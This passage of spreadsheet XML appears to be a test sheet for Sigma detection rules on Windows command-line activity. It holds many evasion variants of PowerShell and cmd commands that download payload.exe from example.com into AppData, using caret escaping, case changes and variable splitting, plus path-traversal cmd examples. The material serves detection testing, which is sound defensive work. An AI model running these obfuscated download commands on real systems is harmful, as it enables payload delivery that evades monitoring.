        </is>
      </c>
      <c r="B2353" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2353" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2353" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2353" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F2353" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2353" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2353" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2353" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2353" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2353" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2354" ht="15.75" customHeight="1" s="42">
      <c r="A2354" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2354" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2354" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2354" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2354" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F2354" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2354" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2354" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2354" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2354" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2354" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2355" ht="15.75" customHeight="1" s="42">
      <c r="A2355" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2355" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2355" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2355" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2355" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F2355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2355" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2355" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2355" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2355" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2355" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2356" ht="15.75" customHeight="1" s="42">
      <c r="A2356" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2356" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2356" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2356" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2356" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F2356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2356" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2356" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2356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2356" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2356" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2357" ht="15.75" customHeight="1" s="42">
      <c r="A2357" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2357" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2357" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2357" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2357" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F2357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2357" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2357" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2357" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2357" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2357" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2358" ht="15.75" customHeight="1" s="42">
      <c r="A2358" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2358" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2358" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2358" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2358" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F2358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2358" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2358" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2358" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2358" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2358" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2359" ht="15.75" customHeight="1" s="42">
      <c r="A2359" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2359" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2359" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2359" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2359" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F2359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2359" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2359" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2359" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2359" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2359" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2360" ht="15.75" customHeight="1" s="42">
      <c r="A2360" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2360" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2360" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2360" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2360" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F2360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2360" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2360" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2360" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2360" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2361" ht="15.75" customHeight="1" s="42">
      <c r="A2361" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2361" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2361" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2361" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2361" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F2361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2361" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2361" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2361" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2362" ht="15.75" customHeight="1" s="42">
      <c r="A2362" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2362" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2362" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2362" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2362" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F2362" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2362" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2362" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2362" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2362" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2362" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2363" ht="15.75" customHeight="1" s="42">
      <c r="A2363" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2363" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2363" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2363" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2363" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F2363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2363" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2363" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2363" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2363" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2364" ht="15.75" customHeight="1" s="42">
      <c r="A2364" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2364" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2364" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2364" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2364" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F2364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2364" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2364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364" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2364" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2365" ht="15.75" customHeight="1" s="42">
      <c r="A2365" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2365" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2365" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2365" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2365" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F2365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2365" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2365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365" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2365" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2366" ht="15.75" customHeight="1" s="42">
      <c r="A2366" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2366" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2366" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2366" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2366" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F2366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2366" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2366" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2366" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2366" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2367" ht="15.75" customHeight="1" s="42">
      <c r="A2367" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2367" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2367" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2367" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2367" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F2367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2367" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2367" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2367" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2367" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2368" ht="15.75" customHeight="1" s="42">
      <c r="A2368" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2368" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2368" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2368" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2368" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F2368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2368" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2368" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2368" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2368" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2369" ht="15.75" customHeight="1" s="42">
      <c r="A2369" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2369" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2369" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2369" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2369" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F2369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2369" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2369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69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2369" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2370" ht="15.75" customHeight="1" s="42">
      <c r="A2370" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2370" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2370" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2370" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2370" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F2370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2370" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2370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370" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2370" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2371" ht="15.75" customHeight="1" s="42">
      <c r="A2371" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2371" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2371" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2371" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2371" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F2371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2371" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2371" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2371" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2371" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2371" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2372" ht="15.75" customHeight="1" s="42">
      <c r="A2372" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2372" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2372" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2372" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2372" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F2372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2372" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2372" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2372" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2372" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2373" ht="15.75" customHeight="1" s="42">
      <c r="A2373" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B2373" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C2373" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D2373" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E2373" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F2373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2373" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2373" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2373" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2373" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2374" ht="15.75" customHeight="1" s="42">
      <c r="A2374" s="43" t="n"/>
      <c r="B2374" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_path_traversal</t>
        </is>
      </c>
      <c r="C2374" s="44" t="inlineStr">
        <is>
          <t>Potential CommandLine Path Traversal Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D2374" s="44" t="inlineStr">
        <is>
          <t>087790e3-3287-436c-bccf-cbd0184a7db1</t>
        </is>
      </c>
      <c r="E2374" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "..\..\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F2374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2374" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2374" s="44" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J2374" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2374" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2375" ht="15.75" customHeight="1" s="42">
      <c r="A2375" s="43" t="n"/>
      <c r="B2375" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_path_traversal</t>
        </is>
      </c>
      <c r="C2375" s="44" t="inlineStr">
        <is>
          <t>Potential CommandLine Path Traversal Via Cmd.EXE</t>
        </is>
      </c>
      <c r="D2375" s="44" t="inlineStr">
        <is>
          <t>087790e3-3287-436c-bccf-cbd0184a7db1</t>
        </is>
      </c>
      <c r="E2375" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "..\..\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F2375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2375" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2375" s="44" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J2375" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2375" s="44" t="b">
        <v>0</v>
      </c>
    </row>
